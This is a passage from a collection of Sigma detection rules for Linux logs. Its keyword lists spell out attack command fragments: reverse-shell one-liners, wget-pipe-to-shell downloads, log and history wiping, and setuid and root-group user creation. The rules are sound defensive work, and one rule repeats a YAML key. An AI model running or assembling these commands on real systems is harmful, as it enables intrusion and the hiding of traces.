29 | level: medium 30 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_unix_shell_configuration_modification.yml: -------------------------------------------------------------------------------- 1 | title: Unix Shell Configuration Modification 2 | id: a94cdd87-6c54-4678-a6cc-2814ffe5a13d 3 | related: 4 | - id: e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9 5 | type: obsoletes 6 | status: experimental 7 | description: Detect unix shell configuration modification. Adversaries may establish persistence through executing malicious commands triggered when a new shell is opened. 8 | references: 9 | - https://objective-see.org/blog/blog_0x68.html 10 | - https://www.glitch-cat.com/p/green-lambert-and-attack 11 | - https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat 12 | author: Peter Matkovski, IAI 13 | date: 2023/03/06 14 | modified: 2023/03/15 15 | tags: 16 | - attack.persistence 17 | - attack.t1546.004 18 | logsource: 19 | product: linux 20 | service: auditd 21 | detection: 22 | selection: 23 | type: 'PATH' 24 | name: 25 | - '/etc/shells' 26 | - '/etc/profile' 27 | - '/etc/profile.d/*' 28 | - '/etc/bash.bashrc' 29 | - '/etc/bashrc' 30 | - '/etc/zsh/zprofile' 31 | - '/etc/zsh/zshrc' 32 | - '/etc/zsh/zlogin' 33 | - '/etc/zsh/zlogout' 34 | - '/etc/csh.cshrc' 35 | - '/etc/csh.login' 36 | - '/root/.bashrc' 37 | - '/root/.bash_profile' 38 | - '/root/.profile' 39 | - '/root/.zshrc' 40 | - '/root/.zprofile' 41 | - '/home/*/.bashrc' 42 | - '/home/*/.zshrc' 43 | - '/home/*/.bash_profile' 44 | - '/home/*/.zprofile' 45 | - '/home/*/.profile' 46 | - '/home/*/.bash_login' 47 | - '/home/*/.bash_logout' 48 | - '/home/*/.zlogin' 49 | - '/home/*/.zlogout' 50 | condition: selection 51 | falsepositives: 52 | - Admin or User activity are expected to generate some false positives 53 | level: medium 54 | -------------------------------------------------------------------------------- 
/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml: -------------------------------------------------------------------------------- 1 | title: Steganography Unzip Hidden Information From Picture File 2 | id: edd595d7-7895-4fa7-acb3-85a18a8772ca 3 | status: test 4 | description: Detects extracting of zip file from image file 5 | references: 6 | - https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/ 7 | author: 'Pawel Mazur' 8 | date: 2021/09/09 9 | modified: 2022/10/09 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1027.003 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | commands: 18 | type: EXECVE 19 | a0: unzip 20 | a1: 21 | a1|endswith: 22 | - '.jpg' 23 | - '.png' 24 | condition: commands and a1 25 | falsepositives: 26 | - Unknown 27 | level: low 28 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_user_discovery.yml: -------------------------------------------------------------------------------- 1 | title: System Owner or User Discovery 2 | id: 9a0d8ca0-2385-4020-b6c6-cb6153ca56f3 3 | status: test 4 | description: Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. 
5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md 7 | author: Timur Zinniatullin, oscd.community 8 | date: 2019/10/21 9 | modified: 2021/11/27 10 | tags: 11 | - attack.discovery 12 | - attack.t1033 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection: 18 | type: 'EXECVE' 19 | a0: 20 | - 'users' 21 | - 'w' 22 | - 'who' 23 | condition: selection 24 | falsepositives: 25 | - Admin activity 26 | level: low 27 | -------------------------------------------------------------------------------- /rules/linux/auditd/lnx_auditd_web_rce.yml: -------------------------------------------------------------------------------- 1 | title: Webshell Remote Command Execution 2 | id: c0d3734d-330f-4a03-aae2-65dacc6a8222 3 | status: test 4 | description: Detects possible command execution by web application/web shell 5 | references: 6 | - Personal Experience of the Author 7 | author: Ilyas Ochkov, Beyu Denis, oscd.community 8 | date: 2019/10/12 9 | modified: 2022/12/25 10 | tags: 11 | - attack.persistence 12 | - attack.t1505.003 13 | logsource: 14 | product: linux 15 | service: auditd 16 | detection: 17 | selection: 18 | # You need to add to the following rules to your auditd.conf config: 19 | # -a always,exit -F arch=b32 -S execve -F euid=33 -k detect_execve_www 20 | # -a always,exit -F arch=b64 -S execve -F euid=33 -k detect_execve_www 21 | # Change the number "33" to the ID of your WebServer user. 
Default: www-data:x:33:33 22 | type: 'SYSCALL' 23 | syscall: 'execve' 24 | key: 'detect_execve_www' 25 | condition: selection 26 | falsepositives: 27 | - Admin activity 28 | - Crazy web applications 29 | level: critical 30 | -------------------------------------------------------------------------------- /rules/linux/builtin/auth/lnx_auth_pwnkit_local_privilege_escalation.yml: -------------------------------------------------------------------------------- 1 | title: PwnKit Local Privilege Escalation 2 | id: 0506a799-698b-43b4-85a1-ac4c84c720e9 3 | status: experimental 4 | description: Detects potential PwnKit exploitation CVE-2021-4034 in auth logs 5 | references: 6 | - https://twitter.com/wdormann/status/1486161836961579020 7 | author: Sreeman 8 | date: 2022/01/26 9 | modified: 2023/01/23 10 | tags: 11 | - attack.privilege_escalation 12 | - attack.t1548.001 13 | logsource: 14 | product: linux 15 | service: auth 16 | detection: 17 | keywords: 18 | '|all': 19 | - 'pkexec' 20 | - 'The value for environment variable XAUTHORITY contains suscipious content' 21 | - '[USER=root] [TTY=/dev/pts/0]' 22 | condition: keywords 23 | falsepositives: 24 | - Unknown 25 | level: high 26 | -------------------------------------------------------------------------------- /rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml: -------------------------------------------------------------------------------- 1 | title: Relevant ClamAV Message 2 | id: 36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb 3 | status: stable 4 | description: Detects relevant ClamAV messages 5 | references: 6 | - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml 7 | author: Florian Roth (Nextron Systems) 8 | date: 2017/03/01 9 | tags: 10 | - attack.resource_development 11 | - attack.t1588.001 12 | logsource: 13 | product: linux 14 | service: clamav 15 | detection: 16 | keywords: 17 | - 'Trojan*FOUND' 18 | - 'VirTool*FOUND' 19 | - 'Webshell*FOUND' 20 | - 
'Rootkit*FOUND' 21 | - 'Htran*FOUND' 22 | condition: keywords 23 | falsepositives: 24 | - Unknown 25 | level: high 26 | -------------------------------------------------------------------------------- /rules/linux/builtin/cron/lnx_cron_crontab_file_modification.yml: -------------------------------------------------------------------------------- 1 | title: Modifying Crontab 2 | id: af202fd3-7bff-4212-a25a-fb34606cfcbe 3 | status: test 4 | description: Detects suspicious modification of crontab file. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md 7 | author: Pawel Mazur 8 | date: 2022/04/16 9 | tags: 10 | - attack.persistence 11 | - attack.t1053.003 12 | logsource: 13 | product: linux 14 | service: cron 15 | detection: 16 | keywords: 17 | - 'REPLACE' 18 | condition: keywords 19 | falsepositives: 20 | - Legitimate modification of crontab 21 | level: medium 22 | -------------------------------------------------------------------------------- /rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml: -------------------------------------------------------------------------------- 1 | title: Guacamole Two Users Sharing Session Anomaly 2 | id: 1edd77db-0669-4fef-9598-165bda82826d 3 | status: test 4 | description: Detects suspicious session with two users present 5 | references: 6 | - https://research.checkpoint.com/2020/apache-guacamole-rce/ 7 | author: Florian Roth (Nextron Systems) 8 | date: 2020/07/03 9 | modified: 2021/11/27 10 | tags: 11 | - attack.credential_access 12 | - attack.t1212 13 | logsource: 14 | product: linux 15 | service: guacamole 16 | detection: 17 | selection: 18 | - '(2 users now present)' 19 | condition: selection 20 | falsepositives: 21 | - Unknown 22 | level: high 23 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_buffer_overflows.yml: 
-------------------------------------------------------------------------------- 1 | title: Buffer Overflow Attempts 2 | id: 18b042f0-2ecd-4b6e-9f8d-aa7a7e7de781 3 | status: stable 4 | description: Detects buffer overflow attempts in Unix system log files 5 | references: 6 | - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml 7 | author: Florian Roth (Nextron Systems) 8 | date: 2017/03/01 9 | tags: 10 | - attack.t1068 11 | - attack.privilege_escalation 12 | logsource: 13 | product: linux 14 | detection: 15 | keywords: 16 | - 'attempt to execute code on stack by' 17 | - 'FTP LOGIN FROM .* 0bin0sh' 18 | - 'rpc.statd[\d+]: gethostbyname error for' 19 | - 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' 20 | condition: keywords 21 | falsepositives: 22 | - Unknown 23 | level: high 24 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_clear_syslog.yml: -------------------------------------------------------------------------------- 1 | title: Commands to Clear or Remove the Syslog - Builtin 2 | id: e09eb557-96d2-4de9-ba2d-30f712a5afd3 3 | status: test 4 | description: Detects specific commands commonly used to remove or empty the syslog 5 | references: 6 | - https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474 7 | author: Max Altgelt (Nextron Systems) 8 | date: 2021/09/10 9 | modified: 2022/11/26 10 | tags: 11 | - attack.impact 12 | - attack.t1565.001 13 | logsource: 14 | product: linux 15 | detection: 16 | selection: 17 | - 'rm /var/log/syslog' 18 | - 'rm -r /var/log/syslog' 19 | - 'rm -f /var/log/syslog' 20 | - 'rm -rf /var/log/syslog' 21 | - 'mv /var/log/syslog' 22 | - ' >/var/log/syslog' 23 | - ' > /var/log/syslog' 24 | falsepositives: 25 | - '/syslog.' 
26 | condition: selection and not falsepositives 27 | falsepositives: 28 | - Log rotation 29 | level: high 30 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_file_copy.yml: -------------------------------------------------------------------------------- 1 | title: Remote File Copy 2 | id: 7a14080d-a048-4de8-ae58-604ce58a795b 3 | status: stable 4 | description: Detects the use of tools that copy files from or to remote systems 5 | references: 6 | - https://attack.mitre.org/techniques/T1105/ 7 | author: Ömer Günal 8 | date: 2020/06/18 9 | tags: 10 | - attack.command_and_control 11 | - attack.lateral_movement 12 | - attack.t1105 13 | logsource: 14 | product: linux 15 | detection: 16 | tools: 17 | - 'scp ' 18 | - 'rsync ' 19 | - 'sftp ' 20 | filter: 21 | - '@' 22 | - ':' 23 | condition: tools and filter 24 | falsepositives: 25 | - Legitimate administration activities 26 | level: low 27 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_ldso_preload_injection.yml: -------------------------------------------------------------------------------- 1 | title: Code Injection by ld.so Preload 2 | id: 7e3c4651-c347-40c4-b1d4-d48590fdf684 3 | status: test 4 | description: Detects the ld.so preload persistence file. See `man ld.so` for more information. 
5 | references: 6 | - https://man7.org/linux/man-pages/man8/ld.so.8.html 7 | author: Christian Burkard (Nextron Systems) 8 | date: 2021/05/05 9 | modified: 2022/10/09 10 | tags: 11 | - attack.persistence 12 | - attack.privilege_escalation 13 | - attack.t1574.006 14 | logsource: 15 | product: linux 16 | detection: 17 | keywords: 18 | - '/etc/ld.so.preload' 19 | condition: keywords 20 | falsepositives: 21 | - Rare temporary workaround for library misconfiguration 22 | level: high 23 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_nimbuspwn_privilege_escalation_exploit.yml: -------------------------------------------------------------------------------- 1 | title: Nimbuspwn Exploitation 2 | id: 7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8 3 | status: experimental 4 | description: Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800) 5 | references: 6 | - https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ 7 | - https://github.com/Immersive-Labs-Sec/nimbuspwn 8 | author: Bhabesh Raj 9 | date: 2022/05/04 10 | modified: 2023/01/23 11 | tags: 12 | - attack.privilege_escalation 13 | - attack.t1068 14 | logsource: 15 | product: linux 16 | detection: 17 | keywords: 18 | '|all': 19 | - 'networkd-dispatcher' 20 | - 'Error handling notification for interface' 21 | - '../../' 22 | condition: keywords 23 | falsepositives: 24 | - Unknown 25 | level: high 26 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_potential_susp_ebpf_activity.yml: -------------------------------------------------------------------------------- 1 | title: Potential Suspicious BPF Activity - Linux 2 | id: 0fadd880-6af3-4610-b1e5-008dc3a11b8a 3 | status: experimental 4 | description: Detects the presence of "bpf_probe_write_user" BPF helper-generated warning messages. 
Which could be a sign of suspicious eBPF activity on the system. 5 | references: 6 | - https://redcanary.com/blog/ebpf-malware/ 7 | - https://man7.org/linux/man-pages/man7/bpf-helpers.7.html 8 | author: Red Canary (idea), Nasreddine Bencherchali 9 | date: 2023/01/25 10 | tags: 11 | - attack.persistence 12 | - attack.defense_evasion 13 | logsource: 14 | product: linux 15 | detection: 16 | selection: 17 | - 'bpf_probe_write_user' 18 | condition: selection 19 | falsepositives: 20 | - Unknown 21 | level: high 22 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_privileged_user_creation.yml: -------------------------------------------------------------------------------- 1 | title: Privileged User Has Been Created 2 | id: 0ac15ec3-d24f-4246-aa2a-3077bb1cf90e 3 | status: test 4 | description: Detects the addition of a new user to a privileged group such as "root" or "sudo" 5 | references: 6 | - https://digital.nhs.uk/cyber-alerts/2018/cc-2825 7 | - https://linux.die.net/man/8/useradd 8 | - https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid 9 | author: Pawel Mazur 10 | date: 2022/12/21 11 | tags: 12 | - attack.persistence 13 | - attack.t1136.001 14 | - attack.t1098 15 | logsource: 16 | product: linux 17 | definition: '/var/log/secure on RHEL systems or /var/log/auth.log on Debian-like systems needs to be collected in order for this detection to work' 18 | detection: 19 | # Examples of the events that could be observed when matching these would be as follows 20 | # Dec 21 16:42:19 testserver useradd[1337]: new user: name=butter1, UID=1000, GID=0, home=/root, shell=/bin/bash 21 | # Dec 21 17:13:54 testserver useradd[1337]: new user: name=john, UID=0, GID=0, home=/home/john, shell=/bin/bash 22 | # Dec 21 17:24:40 testserver useradd[1337]: new user: name=butter3, UID=1000, GID=10, 
home=/home/butter3, shell=/bin/bash 23 | # Dec 21 17:30:22 testserver useradd[1337]: new user: name=butter4, UID=1000, GID=27, home=/home/butter4, shell=/bin/bash 24 | selection_new_user: 25 | - 'new user' 26 | selection_uids_gids: 27 | - 'GID=0' # root group 28 | - 'UID=0' # root UID 29 | - 'GID=10' # wheel group; note: on backends that match keywords as substrings this also hits GID=10xx (e.g. GID=1000), so expect extra false positives there 30 | - 'GID=27' # sudo group 31 | condition: all of selection_* 32 | falsepositives: 33 | - Administrative activity 34 | level: high 35 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_shell_clear_cmd_history.yml: -------------------------------------------------------------------------------- 1 | title: Clear Command History 2 | id: fdc88d25-96fb-4b7c-9633-c0e417fdbd4e 3 | status: test 4 | description: Detects clearing of the command history on Linux, which is used for defense evasion. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md 7 | - https://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics 8 | author: Patrick Bareiss 9 | date: 2019/03/24 10 | modified: 2022/12/25 11 | tags: 12 | - attack.defense_evasion 13 | - attack.t1070.003 14 | # Example config for this one (place it in .bash_profile): 15 | # (is_empty=false; inotifywait -m .bash_history | while read file; do if [ $(wc -l <.bash_history) -lt 1 ]; then if [ "$is_empty" = false ]; then logger -i -p local5.info -t empty_bash_history "$USER : ~/.bash_history is empty "; is_empty=true; fi; else is_empty=false; fi; done ) & 16 | # It monitors the size of .bash_history and logs the word "empty_bash_history" whenever a previously non-empty bash_history becomes empty 17 | # We define an empty file as a document with 0 or 1 lines (it can be a line with only one space character for example) 18 | # It has two advantages over the version suggested by Patrick Bareiss : 19 | # - it is not relative to the exact command used to clear 
.bash_history : for instance Caldera uses "> .bash_history" to clear the history and this is not one of the commands listed here. We can't be exhaustive for all the possibilities! 20 | # - the method suggested by Patrick Bareiss logs all the commands entered directly in a bash shell; therefore it may miss some events (for instance it doesn't log the commands launched from a Caldera agent). Here, if .bash_history is cleared, it will always be detected 21 | logsource: 22 | product: linux 23 | detection: 24 | keywords: 25 | - 'rm *bash_history' 26 | - 'echo "" > *bash_history' 27 | - 'cat /dev/null > *bash_history' 28 | - 'cat /dev/zero > *bash_history' 29 | - 'ln -sf /dev/null *bash_history' 30 | - 'ln -sf /dev/zero *bash_history' 31 | - 'truncate -s0 *bash_history' 32 | # - 'unset HISTFILE' # prone to false positives 33 | - 'export HISTFILESIZE=0' 34 | - 'history -c' 35 | - 'history -w' 36 | - 'shred *bash_history' 37 | - 'empty_bash_history' 38 | - 'chattr +i *bash_history' 39 | condition: keywords 40 | falsepositives: 41 | - Unknown 42 | level: high 43 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_shell_susp_commands.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Activity in Shell Commands 2 | id: 2aa1440c-9ae9-4d92-84a7-a9e5f5e31695 3 | status: test 4 | description: Detects suspicious shell commands used in various exploit codes (see references) 5 | references: 6 | - https://web.archive.org/web/20170319121015/http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html 7 | - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb 8 | - http://pastebin.com/FtygZ1cg 9 | - https://artkond.com/2017/03/23/pivoting-guide/ 10 | author: Florian Roth (Nextron Systems) 11 | date: 2017/08/21 12 | modified: 2021/11/27 13 | 
tags: 14 | - attack.execution 15 | - attack.t1059.004 16 | logsource: 17 | product: linux 18 | detection: 19 | keywords: 20 | # Generic suspicious commands 21 | - 'wget * - http* | perl' 22 | - 'wget * - http* | sh' 23 | - 'wget * - http* | bash' 24 | - 'python -m SimpleHTTPServer' 25 | - '-m http.server' # Python 3 26 | - 'import pty; pty.spawn*' 27 | - 'socat exec:*' 28 | - 'socat -O /tmp/*' 29 | - 'socat tcp-connect*' 30 | - '*echo binary >>*' 31 | # Malware 32 | - '*wget *; chmod +x*' 33 | - '*wget *; chmod 777 *' 34 | - '*cd /tmp || cd /var/run || cd /mnt*' 35 | # Apache Struts in-the-wild exploit codes 36 | - '*stop;service iptables stop;*' 37 | - '*stop;SuSEfirewall2 stop;*' 38 | - 'chmod 777 2020*' 39 | - '*>>/etc/rc.local' 40 | # Metasploit framework exploit codes 41 | - '*base64 -d /tmp/*' 42 | - '* | base64 -d *' 43 | - '*/chmod u+s *' 44 | - '*chmod +s /tmp/*' 45 | - '*chmod u+s /tmp/*' 46 | - '* /tmp/haxhax*' 47 | - '* /tmp/ns_sploit*' 48 | - 'nc -l -p *' 49 | - 'cp /bin/ksh *' 50 | - 'cp /bin/sh *' 51 | - '* /tmp/*.b64 *' 52 | - '*/tmp/ysocereal.jar*' 53 | - '*/tmp/x *' 54 | - '*; chmod +x /tmp/*' 55 | - '*;chmod +x /tmp/*' 56 | condition: keywords 57 | falsepositives: 58 | - Unknown 59 | level: high 60 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_shell_susp_log_entries.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Log Entries 2 | id: f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1 3 | status: test 4 | description: Detects suspicious log entries in Linux log files 5 | author: Florian Roth (Nextron Systems) 6 | date: 2017/03/25 7 | modified: 2021/11/27 8 | tags: 9 | - attack.impact 10 | logsource: 11 | product: linux 12 | detection: 13 | keywords: 14 | # Generic suspicious log lines 15 | - entered promiscuous mode 16 | # OSSEC https://github.com/ossec/ossec-hids/blob/master/etc/rules/syslog_rules.xml 17 | - Deactivating service 18 | - 
Oversized packet received from 19 | - imuxsock begins to drop messages 20 | condition: keywords 21 | falsepositives: 22 | - Unknown 23 | level: medium 24 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_shell_susp_rev_shells.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Reverse Shell Command Line 2 | id: 738d9bcf-6999-4fdb-b4ac-3033037db8ab 3 | status: test 4 | description: Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell 5 | references: 6 | - https://alamot.github.io/reverse_shells/ 7 | author: Florian Roth (Nextron Systems) 8 | date: 2019/04/02 9 | modified: 2021/11/27 10 | tags: 11 | - attack.execution 12 | - attack.t1059.004 13 | logsource: 14 | product: linux 15 | detection: 16 | keywords: 17 | - 'BEGIN {s = "/inet/tcp/0/' 18 | - 'bash -i >& /dev/tcp/' 19 | - 'bash -i >& /dev/udp/' 20 | - 'sh -i >$ /dev/udp/' 21 | - 'sh -i >$ /dev/tcp/' 22 | - '&& while read line 0<&5; do' 23 | - '/bin/bash -c exec 5<>/dev/tcp/' 24 | - '/bin/bash -c exec 5<>/dev/udp/' 25 | - 'nc -e /bin/sh ' 26 | - '/bin/sh | nc' 27 | - 'rm -f backpipe; mknod /tmp/backpipe p && nc ' 28 | - ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))' 29 | - ';STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 30 | - '/bin/sh -i <&3 >&3 2>&3' 31 | - 'uname -a; w; id; /bin/bash -i' 32 | - '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()};' 33 | - ';os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(''HISTFILE'',''/dev/null'');' 34 | - '.to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 35 | - ';while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print' 36 | - 'socat exec:''bash -li'',pty,stderr,setsid,sigint,sane tcp:' 37 | - 'rm -f /tmp/p; mknod /tmp/p p &&' 38 | - ' | 
/bin/bash | telnet ' 39 | - ',echo=0,raw tcp-listen:' 40 | - 'nc -lvvp ' 41 | - 'xterm -display 1' 42 | condition: keywords 43 | falsepositives: 44 | - Unknown 45 | level: high 46 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_shellshock.yml: -------------------------------------------------------------------------------- 1 | title: Shellshock Expression 2 | id: c67e0c98-4d39-46ee-8f6b-437ebf6b950e 3 | status: test 4 | description: Detects shellshock expressions in log files 5 | references: 6 | - https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf 7 | author: Florian Roth (Nextron Systems) 8 | date: 2017/03/14 9 | modified: 2022/10/09 10 | tags: 11 | - attack.persistence 12 | - attack.t1505.003 13 | logsource: 14 | product: linux 15 | detection: 16 | keywords: 17 | - '(){:;};' 18 | - '() {:;};' 19 | - '() { :;};' 20 | - '() { :; };' 21 | condition: keywords 22 | falsepositives: 23 | - Unknown 24 | level: high 25 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_space_after_filename_.yml: -------------------------------------------------------------------------------- 1 | title: Space After Filename 2 | id: 879c3015-c88b-4782-93d7-07adf92dbcb7 3 | status: test 4 | description: Detects space after filename 5 | references: 6 | - https://attack.mitre.org/techniques/T1064 7 | author: Ömer Günal 8 | date: 2020/06/17 9 | modified: 2021/11/27 10 | tags: 11 | - attack.execution 12 | logsource: 13 | product: linux 14 | detection: 15 | selection1: 16 | - 'echo "*" > * && chmod +x *' 17 | selection2: 18 | - 'mv * "* "' 19 | condition: all of selection* 20 | falsepositives: 21 | - Typos 22 | level: low 23 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_susp_dev_tcp.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Use of /dev/tcp 2 | 
id: 6cc5fceb-9a71-4c23-aeeb-963abe0b279c 3 | status: experimental 4 | description: Detects suspicious commands using /dev/tcp 5 | references: 6 | - https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/ 7 | - https://book.hacktricks.xyz/shells/shells/linux 8 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan 9 | author: frack113 10 | date: 2021/12/10 11 | modified: 2023/01/06 12 | tags: 13 | - attack.reconnaissance 14 | logsource: 15 | product: linux 16 | detection: 17 | keywords: 18 | - 'cat /dev/tcp/' 20 | - 'echo >/dev/tcp/' 21 | - 'bash -i >& /dev/tcp/' 22 | - 'sh -i >& /dev/udp/' 23 | - '0<&196;exec 196<>/dev/tcp/' 24 | - 'exec 5<>/dev/tcp/' 25 | - '(sh)0>/dev/tcp/' 26 | - 'bash -c ''bash -i >& /dev/tcp/' 27 | - 'echo -e ''#!/bin/bash\nbash -i >& /dev/tcp/' 28 | condition: keywords 29 | falsepositives: 30 | - Unknown 31 | level: medium 32 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_susp_jexboss.yml: -------------------------------------------------------------------------------- 1 | title: JexBoss Command Sequence 2 | id: 8ec2c8b4-557a-4121-b87c-5dfb3a602fae 3 | status: test 4 | description: Detects the suspicious command sequence used by JexBoss 5 | references: 6 | - https://www.us-cert.gov/ncas/analysis-reports/AR18-312A 7 | author: Florian Roth (Nextron Systems) 8 | date: 2017/08/24 9 | modified: 2022/07/07 10 | tags: 11 | - attack.execution 12 | - attack.t1059.004 13 | logsource: 14 | product: linux 15 | detection: 16 | selection1: 17 | - 'bash -c /bin/bash' 18 | selection2: 19 | - '&/dev/tcp/' 20 | condition: all of selection* 21 | falsepositives: 22 | - Unknown 23 | level: high 24 | -------------------------------------------------------------------------------- /rules/linux/builtin/lnx_symlink_etc_passwd.yml: -------------------------------------------------------------------------------- 
1 | title: Symlink Etc Passwd 2 | id: c67fc22a-0be5-4b4f-aad5-2b32c4b69523 3 | status: test 4 | description: Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd 5 | references: 6 | - https://www.qualys.com/2021/05/04/21nails/21nails.txt 7 | author: Florian Roth (Nextron Systems) 8 | date: 2019/04/05 9 | modified: 2021/11/27 10 | tags: 11 | - attack.t1204.001 12 | - attack.execution 13 | logsource: 14 | product: linux 15 | detection: 16 | keywords: 17 | - 'ln -s -f /etc/passwd' 18 | - 'ln -s /etc/passwd' 19 | condition: keywords 20 | falsepositives: 21 | - Unknown 22 | level: high 23 | -------------------------------------------------------------------------------- /rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml: -------------------------------------------------------------------------------- 1 | title: SSHD Error Message CVE-2018-15473 2 | id: 4c9d903d-4939-4094-ade0-3cb748f4d7da 3 | status: test 4 | description: Detects exploitation attempts using public exploit code for CVE-2018-15473 5 | references: 6 | - https://github.com/Rhynorater/CVE-2018-15473-Exploit 7 | author: Florian Roth (Nextron Systems) 8 | date: 2017/08/24 9 | modified: 2021/11/27 10 | tags: 11 | - attack.reconnaissance 12 | - attack.t1589 13 | logsource: 14 | product: linux 15 | service: sshd 16 | detection: 17 | keywords: 18 | - 'error: buffer_get_ret: trying to get more bytes 1907 than in buffer 308 [preauth]' 19 | condition: keywords 20 | falsepositives: 21 | - Unknown 22 | level: medium 23 | -------------------------------------------------------------------------------- /rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious OpenSSH Daemon Error 2 | id: e76b413a-83d0-4b94-8e4c-85db4a5b8bdc 3 | status: test 4 | description: Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploitation 
attempts 5 | references: 6 | - https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c 7 | - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml 8 | author: Florian Roth (Nextron Systems) 9 | date: 2017/06/30 10 | modified: 2021/11/27 11 | tags: 12 | - attack.initial_access 13 | - attack.t1190 14 | logsource: 15 | product: linux 16 | service: sshd 17 | detection: 18 | keywords: 19 | - 'unexpected internal error' 20 | - 'unknown or unsupported key type' 21 | - 'invalid certificate signing key' 22 | - 'invalid elliptic curve value' 23 | - 'incorrect signature' 24 | - 'error in libcrypto' 25 | - 'unexpected bytes remain after decoding' 26 | - 'fatal: buffer_get_string: bad string' 27 | - 'Local: crc32 compensation attack' 28 | - 'bad client public DH value' 29 | - 'Corrupted MAC on input' 30 | condition: keywords 31 | falsepositives: 32 | - Unknown 33 | level: medium 34 | -------------------------------------------------------------------------------- /rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml: -------------------------------------------------------------------------------- 1 | title: Sudo Privilege Escalation CVE-2019-14287 - Builtin 2 | id: 7fcc54cb-f27d-4684-84b7-436af096f858 3 | related: 4 | - id: f74107df-b6c6-4e80-bf00-4170b658162b 5 | type: derived 6 | status: test 7 | description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 8 | references: 9 | - https://www.openwall.com/lists/oss-security/2019/10/14/1 10 | - https://access.redhat.com/security/cve/cve-2019-14287 11 | - https://twitter.com/matthieugarin/status/1183970598210412546 12 | author: Florian Roth (Nextron Systems) 13 | date: 2019/10/15 14 | modified: 2022/11/26 15 | tags: 16 | - attack.privilege_escalation 17 | - attack.t1068 18 | - attack.t1548.003 19 | - cve.2019.14287 20 | logsource: 21 | product: linux 22 | service: 